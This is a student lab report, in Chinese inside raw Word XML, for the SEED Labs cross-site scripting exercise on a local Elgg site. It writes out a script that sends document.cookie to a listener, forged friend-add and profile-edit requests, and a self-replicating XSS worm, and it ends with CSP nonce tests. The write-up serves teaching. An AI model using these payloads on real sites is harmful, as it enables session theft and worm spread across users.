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Task1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登录Samy'的账号在Samy主页个人信息编辑的“Brief description”一栏中输入实验中要求的JS代码。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13655" cy="3536315"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1460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13655" cy="353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接着切换账号至Alice，访问Samy的主页，出现了我们预期中的alert。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38115" cy="3859530"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1143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385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Task2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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>登录Samy'的账号在Samy主页个人信息编辑的“Brief description”一栏中输入实验中要求的JS代码。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12360" cy="3359150"/>
            <wp:effectExtent l="0" t="0" r="10160" b="889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rcRect t="439" r="2322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接着切换账号至Alice，访问Samy的主页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09060" cy="3870325"/>
            <wp:effectExtent l="0" t="0" r="7620" b="63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rcRect l="4196" t="726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87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Task3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根据实验所给代码，将ip地址改为127.0.0.1，向Samy的签名中加入如下部分：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&lt;script&gt;document.write(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;img src=http://172.0.0.1:5555?c=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 xml:space="preserve">+ escape(document.cookie) + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;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);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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0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605780" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="9" name="图片 9" descr="Screenshot from 2020-09-15 17-25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creenshot from 2020-09-15 17-25-03"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:srcRect t="30270" r="5494" b="10924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在终端输入如下指令，登录Alice的账号访问Samy主页，得到如下结果：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723255" cy="1868805"/>
            <wp:effectExtent l="0" t="0" r="6985" b="57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rcRect l="3557" t="40691" r="41813" b="26067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Task4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我们登录Boby的账号，加Samy好友，同时开启HTTP Header Live抓取，得到如下信息：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88610" cy="852805"/>
            <wp:effectExtent l="0" t="0" r="6350" b="63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rcRect t="2246" r="4366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85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可看出，Samy的ID是47。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接着，我们在Samy主页的“About me“（Edit HTML）中键入如下内容：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&lt;script type="text/javascript"&gt;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window.onload = function () {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var Ajax=null;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var ts="&amp;__elgg_ts="+elgg.security.token.__elgg_ts;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var token="&amp;__elgg_token="+elgg.security.token.__elgg_token;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//Construct the HTTP request to add Samy as a friend.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var sendurl="http://www.xsslabelgg.com/action/friends/add"+"?friend=47"+token+ts; //在此处键入好友，时间戳，令牌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//Create and send Ajax request to add friend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Ajax=new XMLHttpRequest();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Ajax.open("GET",sendurl,true);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Ajax.setRequestHeader("Host","www.xsslabelgg.com");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Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");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Ajax.send();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}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&lt;/script&gt;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56480" cy="917575"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1206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rcRect t="-607" r="34291"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4856480" cy="91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然后登上alice账号，可以看到此时Alice还没有加Smay为好友。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14620" cy="3660140"/>
            <wp:effectExtent l="0" t="0" r="12700" b="1270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366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</w:p>
    <w:p>
      <w:p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点击Samy主页，发现此时Alice已经添加Samy为好友了。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02250" cy="3773170"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635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77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</w:p>
    <w:p>
      <w:p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Task5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars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修改个人简介并抓包，得到以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5471795" cy="1365250"/>
            <wp:effectExtent l="0" t="0" r="14605" b="635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rcRect l="23969" t="29798" r="7191" b="38192"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5471795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由之前抓到的数据，我们知道Samy的ID是47，因此我们要让Samy排除在受害者之外，修改实验中给的代码，将如下内容像上一个Task中同样操作写进自我介绍。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&lt;script type="text/javascript" &gt;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window.onload = function()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{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var guid = "&amp;guid="+elgg.session.user.guid;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var ts="&amp;__elgg_ts=" + elgg.security.token.__elgg_ts;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var token="&amp;__elgg_token=" + elgg.security.token.__elgg_token;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var name = "&amp;name=" + elgg.session.user.name;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var desc = "&amp;description=Samy is my hero " + "accesslevel[description]=2";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var sendurl = "http://www.xsslabelgg.com/action/profile/edit";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var content = token + ts + name + desc + guid; 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if(elgg.session.user.guid!=47)  {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var Ajax=null;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Ajax=new XMLHttpRequest();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Ajax.open("POST",sendurl,true);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Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");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Ajax.send(content);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} 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}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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3844925" cy="1979930"/>
            <wp:effectExtent l="0" t="0" r="10795" b="127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rcRect l="23668" t="27506" r="25464" b="23685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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在点击Samy主页前Alice的自我介绍：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793615" cy="2978785"/>
            <wp:effectExtent l="0" t="0" r="6985" b="825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rcRect l="38299" t="28023" r="27620" b="32505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left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>点击Samy个人主页后：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717415" cy="3369310"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1397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rcRect l="5649" t="32757" r="4878" b="7678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Task6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1通过DOM的方法实现自我传播的XSS蠕虫。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根据实验手册，对Task5中的代码进行修改，增加自我复制的功能，代码改变为如下如下：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&lt;script type="text/javascript" id="worm" &gt;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window.onload = function()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var headerTag = "&lt;script id=\"worm\" type=\"text/javascript\"&gt;"; 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var jsCode = document.getElementById("worm").innerHTML; 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var tailTag = "&lt;/" + "script&gt;"; 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var wormCode = encodeURIComponent(headerTag + jsCode + tailTag); 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var desc = "&amp;description=Samy is my hero!!!" + wormCode;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desc+="&amp;accesslevel[description]=2";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var name = "&amp;name=" + elgg.session.user.name;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var guid = "&amp;guid="+elgg.session.user.guid;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var ts="&amp;__elgg_ts=" + elgg.security.token.__elgg_ts;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var token="&amp;__elgg_token=" + elgg.security.token.__elgg_token;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var sendurl = "http://www.xsslabelgg.com/action/profile/edit";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var content = token + ts + name + desc + guid; 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if(elgg.session.user.guid!=47)  {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var Ajax=null;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Ajax=new XMLHttpRequest();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Ajax.open("POST",sendurl,true);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Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");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Ajax.send(content);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} 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&lt;/script&gt;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同样的，将代码放到Samy个人简介处。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先用Alice账号访问Samy主页，个人介绍被篡改：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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132455" cy="3636010"/>
            <wp:effectExtent l="0" t="0" r="6985" b="635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rcRect l="7976" t="28909" r="32590" b="7277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查看Alice主页中个人简介的代码，变成如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4977765" cy="2882265"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1333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7542" t="29110" b="21375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说明恶意代码已经完成了自我复制。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然后登录Boby账号访问Alice主页，Boby的个人主页同样被篡改。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023360" cy="2911475"/>
            <wp:effectExtent l="0" t="0" r="0" b="1460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5518" t="25254" r="31723" b="32743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点开主页中的个人简介，发现恶意代码同样完成了自我复制：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937760" cy="2893695"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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rcRect l="6518" t="29578" r="10048" b="2519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由此，该恶意代码可以一直传播下去。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2通过链接的方法实现自我传播的XSS蠕虫。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修改上一步中的代码为如下，创建文件夹xss_worm.js并保存到/var/www/xss/Elgg路径下。</w:t>
      </w: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window.onload = function()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{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var wormCode = encodeURIComponent(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>"&lt;script type=\"text/javascript\" " +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>"id = \"worm\" " +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>"src=\"http://www.xsslabelgg.com/xssworm.js\"&gt; "+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 xml:space="preserve"> "&lt;/" + "script&gt;"); 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var desc = "&amp;description=Samy is my HERO!!!" + wormCode;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desc+="&amp;accesslevel[description]=2";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var name = "&amp;name=" + elgg.session.user.name;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var guid = "&amp;guid="+elgg.session.user.guid;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var ts="&amp;__elgg_ts=" + elgg.security.token.__elgg_ts;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var token="&amp;__elgg_token=" + elgg.security.token.__elgg_token;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var sendurl = "http://www.xsslabelgg.com/action/profile/edit";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var content = token + ts + name + desc + guid; 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if(elgg.session.user.guid!=47)  {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var Ajax=null;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Ajax=new XMLHttpRequest();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Ajax.open("POST",sendurl,true);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Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");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Ajax.send(content);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} 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}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231515" cy="2230755"/>
            <wp:effectExtent l="0" t="0" r="14605" b="952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rcRect l="26193" t="21393" r="-229" b="31195"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3231515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向Samy的简介部分写入如下代码段：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&lt;script type="text/javascript" src="http://www.xsslabelgg.com/xss_worm.js"&gt; &lt;/script&gt;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343400" cy="2550795"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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rcRect l="21859" t="25708" r="25898" b="1710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用上一步中同样的方法验证，先登Boby账号看Samy主页，再等Alice账号看Boby主页，发现代码自动传播。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4236720" cy="3486785"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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rcRect l="25054" t="27865" r="32108" b="6427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9250" cy="2675255"/>
            <wp:effectExtent l="0" t="0" r="1270" b="698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rcRect l="23306" t="26661" r="21992" b="10802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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4260215" cy="2634615"/>
            <wp:effectExtent l="0" t="0" r="6985" b="190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rcRect l="24174" t="28494" r="30733" b="19526"/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86605" cy="3032760"/>
            <wp:effectExtent l="0" t="0" r="635" b="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rcRect l="24174" t="28045" r="21992" b="5618"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="458660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Task7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按实验要求从SEEDlab官网下载csp.zip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（下载地址https://seedsecuritylabs.org/Labs_16.04/Web/Web_XSS_Elgg/）；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点开csp中的csptest.html，结果如下：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915535" cy="2211070"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1397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rcRect l="6371" t="20216" r="397" b="40978"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4915535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按实验要求将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127.0.0.1 www.example32.com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127.0.0.1 www.example68.com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127.0.0.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.example79.com" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>www.example79.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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写入/etc/host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917315" cy="3906520"/>
            <wp:effectExtent l="0" t="0" r="14605" b="1016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25322" t="28700" r="325" b="2838"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3917315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运行csp中的hppt_server.py，然后用浏览器访问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http://www.example32.com:8000/csptest.html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http://www.example68.com:8000/csptest.html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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.example79.com:8000/csptest.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://www.example79.com:8000/csptest.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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79：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932045" cy="2159635"/>
            <wp:effectExtent l="0" t="0" r="5715" b="444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rcRect l="6388" t="17093" b="45059"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="493204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32：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947285" cy="2214880"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1016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rcRect l="6099" t="16292" b="44892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68：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932045" cy="2214880"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1016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rcRect l="6388" t="16426" b="44759"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="493204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综上可看出，登录32.68.79三个网站，1, 2, 4, 5, 6 中唯有2不能通过，原因在于2对应的nonce没有被允许嵌入，要改变这种情况，要指明来自2rB3333的嵌入内容是可信度，做如下修改即可（如图示）：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3830955</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1393825</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="883920" cy="236220"/>
                <wp:effectExtent l="4445" t="4445" r="10795" b="18415"/>
                <wp:wrapNone/>
                <wp:docPr id="35" name="双括号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73955" y="2902585"/>
                          <a:ext cx="883920" cy="236220"/>
                        </a:xfrm>
                        <a:prstGeom prst="bracketPair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85" type="#_x0000_t185" style="position:absolute;left:0pt;margin-left:301.65pt;margin-top:109.75pt;height:18.6pt;width:69.6pt;z-index:251658240;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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CZiHEfZAAAACwEAAA8AAAAA&#10;AAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kARITKE2gEAAHcDAAAO&#10;AAAAAAAAAAEAIAAAACgBAABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAAB0BQAAAAA=&#10;" adj="3600">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1.5pt" color="#ED7D31 [3205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391785" cy="2433955"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445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rcRect l="7007" t="18772" r="-433" b="41921"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效果立竿见影：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32：</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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874260" cy="2303145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1333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34"/>
                    <a:srcRect l="7585" t="14755" b="44547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68：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897120" cy="2255520"/>
            <wp:effectExtent l="0" t="0" r="10160" b="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rcRect l="7151" t="17224" b="42920"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="489712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79：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933315" cy="2226310"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1397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rcRect l="6465" t="16023" b="44636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imbusMonL-Regu">
    <w:altName w:val="★懐流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★懐流体">
    <w:panose1 w:val="02000600000000000000"/>
    <w:charset w:val="80"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="A00002BF" w:usb1="68C7FCFB" w:usb2="00000010" w:usb3="00000000" w:csb0="4002009F" w:csb1="DFD70000"/>
  </w:font>
  <w:font w:name="NimbusRomNo9L-Regu">
    <w:altName w:val="★懐流体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C4C70CC"/>
    <w:rsid w:val="0C4C70CC"/>
    <w:rsid w:val="12070068"/>
    <w:rsid w:val="1C0903A2"/>
    <w:rsid w:val="1EDB71ED"/>
    <w:rsid w:val="22B054B6"/>
    <w:rsid w:val="23B75024"/>
    <w:rsid w:val="27292C52"/>
    <w:rsid w:val="38004F7C"/>
    <w:rsid w:val="3E565AE6"/>
    <w:rsid w:val="502B7BE0"/>
    <w:rsid w:val="50CF3320"/>
    <w:rsid w:val="54514D9B"/>
    <w:rsid w:val="5A6037EB"/>
    <w:rsid w:val="61E24AD5"/>
    <w:rsid w:val="6D7F61E2"/>
    <w:rsid w:val="7D7A5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2020-09-15T09:31:00Z</dcterms:created>
  <dc:creator>23129</dc:creator>
  <cp:lastModifiedBy>23129</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-17T17:27:01Z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